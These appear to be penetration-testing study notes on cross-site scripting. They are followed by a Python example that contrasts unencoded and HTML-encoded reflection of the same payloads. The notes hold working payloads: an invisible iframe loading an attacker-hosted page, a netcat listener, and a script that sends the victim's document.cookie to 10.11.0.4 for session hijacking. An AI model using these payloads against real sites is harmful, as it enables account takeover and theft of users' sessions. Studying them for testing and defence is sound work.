Cross-Site Scripting
- If the data displayed on the website is not sanitized (server-side), we can abuse it to execute JavaScript in the browser of the user viewing the page, under that user's context
- Sometimes output can appear not to be sanitized, but it's just encoded
- To verify, use the browser's debugger/inspector
Identifying XSS Vulnerabilities
- Search for input fields which display unsanitized output
- Test with these characters:
< > ' " { } ;
Basic XSS
<script>alert('XSS')</script>
Content Injection
<iframe src="http://10.11.0.4/report" height="0" width="0"></iframe>
- IFrames are used to embed another file, in our case the report page hosted by us
- The IFrame is invisible since it doesn't have any height or width
- To test if it works:
sudo nc -nvlp 80
- Browse the page as a normal user would and check whether the request shows up in netcat
Stealing Cookies and Session Information
- If we can steal an authenticated user's cookie, we can use it to impersonate them.
<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>
- Once the cookie has been retrieved, use the Cookie-Editor addon in Firefox to add/manipulate your own cookies
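Added example, not part of the original notes: a small Python renderer that reflects untrusted input with and without output encoding, showing the difference between "unsanitized" and "just encoded" output described at the top of the page. The `render` page fragment is hypothetical; the payloads are the ones listed above, reused as constructed test input.

```python
import html

# Constructed sample input: the payloads from the notes above, replayed against a
# tiny server-side renderer to show unencoded vs. encoded reflection.
PAYLOADS = [
    "<script>alert('XSS')</script>",
    '<iframe src="http://10.11.0.4/report" height="0" width="0"></iframe>',
    '<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>',
]
TEST_CHARS = "<>'\"{};"  # the probe characters listed in the notes


def render(display_name: str, search_term: str, *, encode: bool) -> str:
    """Reflect two untrusted values, one in an element body and one inside a
    double-quoted attribute. encode=False is the vulnerable behaviour the notes
    exploit; encode=True applies HTML entity encoding at output time."""
    enc = (lambda s: html.escape(s, quote=True)) if encode else (lambda s: s)
    return (f"<p>Welcome, {enc(display_name)}</p>\n"
            f'<input type="text" name="q" value="{enc(search_term)}">')


def reflected_raw(page: str, injected: str) -> bool:
    """The notes' test: does the injected string come back byte-for-byte?
    If so it was neither stripped nor encoded."""
    return injected in page


def vulnerable_to(payload: str) -> bool:
    """The unencoded renderer hands the payload back intact."""
    return reflected_raw(render(payload, payload, encode=False), payload)


def hardened_against(payload: str) -> bool:
    """With encoding the payload never appears intact; in the inspector it
    shows as &lt;script&gt;..., the 'not sanitised, just encoded' case."""
    return not reflected_raw(render(payload, payload, encode=True), payload)


def surviving_test_chars() -> str:
    """Probe characters HTML encoding leaves unchanged. { } ; are harmless in
    HTML but matter in other output contexts (JS strings, templates), each of
    which needs its own encoder."""
    return "".join(c for c in TEST_CHARS if html.escape(c, quote=True) == c)


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"raw: {vulnerable_to(p)}  blocked by encoding: {hardened_against(p)}")
    print("probe chars HTML encoding leaves untouched:", surviving_test_chars())
```

Output encoding stops the reflection itself; setting the session cookie with the HttpOnly flag additionally keeps `document.cookie` from exposing it even if a script does run.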